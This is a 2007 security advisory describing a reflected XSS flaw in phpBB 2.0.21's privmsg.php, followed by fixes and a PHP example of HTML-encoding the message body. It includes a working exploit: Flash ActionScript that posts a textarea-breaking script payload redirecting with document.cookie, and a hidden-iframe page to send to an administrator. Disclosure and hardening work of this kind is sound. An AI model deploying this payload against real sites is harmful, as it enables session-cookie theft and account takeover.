Date: 11 Jan 2007 00:58:36 -0000
Subject: phpBB (privmsg.php) XSS Exploit

phpBB (privmsg.php) XSS Exploit

By: Demential
PhpBB website:

Exploit tested on phpBB 2.0.21:

Input passed to the "Message body" form field in privmsg.php
is not properly sanitised before it is returned to the user
when a private message is sent to a non-existent user.
This can be exploited to execute arbitrary HTML and script code
in a user's browser session in the context of the affected site.

The Exploit:

Create a Shockwave Flash file with this code:

// ActionScript 2 timeline code: variables declared on the main timeline
// are sent as POST fields by getURL() when its method argument is "POST".
// The field names match the compose form that privmsg.php expects.
var username:String = "user_that_doesnt_exist";   // recipient must not exist, so the form is redisplayed with an error
var subject:String = "Xss Exploitation";
// Message body: closes the <textarea> the board echoes it back into, then runs script
var message:String = "</textarea><script>document.location= '' + document.cookie </script>";
var folder:String = "inbox";
var mode:String = "post";
var post:String = "Submit";                         // the submit button's name/value
// getURL(url, window, method): url is the target board's privmsg.php (left empty here),
// "_self" loads the response into the frame holding the .swf, "POST" sends the variables above.
getURL("", "_self", "POST");

Put it into a web page:

<title>Put a title here</title>
<p>Put some text here</p>
<!-- the invisible iframe loads the .swf built above; its src is the URL of that file -->
<iframe src="" frameborder="0" height="0" width="0"></iframe>

Then send the page to the admin (or a normal user).
The victim must be logged in: the hidden iframe submits the private-message
form with the victim's own session cookie, so the reflected script runs in
that session.

The Fix:

Open phpBB2/privmsg.php and find:

			if (!($to_userdata = $db->sql_fetchrow($result)))
			{
				$error = TRUE;
				$error_msg = $lang['No_such_user'];
			}

replace with:

			if (!($to_userdata = $db->sql_fetchrow($result)))
			{
				$error = TRUE;
				echo "Sorry, but no such user exists.";
			}
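The root cause is that the submitted message body is written back into the form's <textarea> unencoded, so a body containing "</textarea>" ends the element and whatever follows is parsed as markup. The replacement above changes only how the "no such user" error is reported; the general remedy for this class of bug is to HTML-encode the body whenever it is re-emitted into the page. The following is an added example, not phpBB's own code: a reduced model of the form redisplay with the vulnerable and hardened versions side by side. The function names, the literal error string and the sample payload are constructed for this example.

```php
<?php
// Added example (not phpBB code): the privmsg.php redisplay pattern reduced
// to its core. Assumed: when the recipient lookup fails, the compose form is
// rendered again with the submitted "message" so the user can correct it;
// $lang['No_such_user'] is stood in for by a literal string.

// Vulnerable: the body is concatenated into the <textarea> as-is. A body
// that contains "</textarea>" closes the element, and the rest of the body
// (the advisory's <script>) becomes live markup.
function render_pm_form_vulnerable(string $message, string $error_msg): string
{
    return '<p class="error">' . $error_msg . '</p>' . "\n"
         . '<form method="post" action="privmsg.php">' . "\n"
         . '<textarea name="message">' . $message . '</textarea>' . "\n"
         . '</form>';
}

// Hardened: encode the body for an HTML text context before re-emitting it.
// "<", ">", "&" and both quote characters become entities, so the string
// "</textarea>" is shown as text inside the box instead of ending it.
function render_pm_form_hardened(string $message, string $error_msg): string
{
    $safe_message = htmlspecialchars($message, ENT_QUOTES, 'UTF-8');
    return '<p class="error">' . $error_msg . '</p>' . "\n"
         . '<form method="post" action="privmsg.php">' . "\n"
         . '<textarea name="message">' . $safe_message . '</textarea>' . "\n"
         . '</form>';
}

// Returns true when the rendered page contains a real <script> element,
// i.e. the payload escaped the <textarea>.
function page_contains_script(string $html): bool
{
    return strpos($html, '<script>') !== false;
}

// Constructed input: the message body from the advisory's Flash file.
$payload      = "</textarea><script>document.location= '' + document.cookie </script>";
$no_such_user = 'Sorry, but no such user exists.';

$vuln = render_pm_form_vulnerable($payload, $no_such_user);
$safe = render_pm_form_hardened($payload, $no_such_user);

echo "vulnerable: " . (page_contains_script($vuln) ? 'script element present' : 'clean') . "\n";
echo "hardened:   " . (page_contains_script($safe) ? 'script element present' : 'clean') . "\n";
echo "\n" . $safe . "\n";
```

Run it with `php` on the command line: the vulnerable rendering reports a live script element, the hardened one does not, and the printed hardened form shows the payload as harmless entity-encoded text inside the <textarea>. Note that this is a textarea, not a rich-text field, so nothing about the message needs to survive as markup; the same encoding step applies anywhere else the board echoes the body back (preview, quote, error pages).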
